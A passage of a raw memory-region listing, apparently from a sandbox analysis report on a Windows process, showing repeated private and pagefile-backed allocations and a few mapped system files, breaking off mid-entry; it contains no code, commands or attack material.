Region: id = 4910 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4911 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4912 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4913 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4914 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4915 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4916 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4917 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4918 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4919 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4920 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4921 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4922 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4923 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4924 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4925 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4926 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4927 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4928 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4929 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4930 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4931 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4932 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4933 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4934 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4935 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4936 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4937 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4938 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4939 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4940 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4941 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4942 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4943 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4944 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4945 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4946 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4947 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4948 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4949 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4950 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4951 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4952 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4953 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4954 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4956 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4957 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4958 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4960 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4961 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4962 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4963 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4964 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4965 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4966 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4967 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4968 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4969 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4970 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4971 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4972 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4973 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4974 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4976 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4977 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4978 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4979 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4980 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4981 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4982 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4983 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4984 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4985 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4986 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4987 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4988 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4989 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4990 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4991 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4992 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4993 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4994 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4995 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4996 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4997 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4998 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4999 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5000 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5001 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5002 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5003 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5004 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5005 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5006 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5007 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5008 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5009 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5010 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5011 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5012 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5013 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5014 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5015 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5016 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5017 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5018 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5019 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5020 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5021 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5022 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5023 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5024 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5025 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5026 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5027 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5028 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5029 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5030 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5031 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5032 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5033 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5034 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5035 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5036 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5037 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5038 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5039 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5040 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5041 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5042 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5043 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5044 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5045 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5046 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5047 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5048 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5049 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5050 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5051 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5052 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5053 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5054 start_va = 0x2240000 end_va = 0x225dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5055 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5056 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5057 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5058 start_va = 0x470000 end_va = 0x471fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 5059 start_va = 0x2240000 end_va = 0x2261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 5060 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5063 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5064 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5067 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5068 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5069 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5071 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5072 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5073 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5075 start_va = 0x7ffc49fa0000 end_va = 0x7ffc4a053fff monitored = 0 entry_point = 0x7ffc49fb53b0 region_type = mapped_file name = "windows.internal.shell.broker.dll" filename = "\\Windows\\System32\\Windows.Internal.Shell.Broker.dll" (normalized: "c:\\windows\\system32\\windows.internal.shell.broker.dll") Region: id = 5076 start_va = 0x110e0000 end_va = 0x1115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000110e0000" filename = "" Region: id = 5077 start_va = 0x7ff6a5a50000 end_va = 0x7ff6a621bfff monitored = 0 entry_point = 0x7ff6a5de9010 region_type = mapped_file name = "ntoskrnl.exe" filename = "\\Windows\\System32\\ntoskrnl.exe" (normalized: "c:\\windows\\system32\\ntoskrnl.exe") Region: id = 5078 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5079 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5080 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5081 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5082 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5083 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5084 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5085 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5086 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5087 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5088 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5089 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5090 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5091 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5092 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5093 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5094 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5095 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5096 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5097 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5098 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5099 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5100 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5101 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5102 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5103 start_va = 0x2760000 end_va = 0x277dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 5104 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5105 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 5106 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5107 start_va = 0x2760000 end_va = 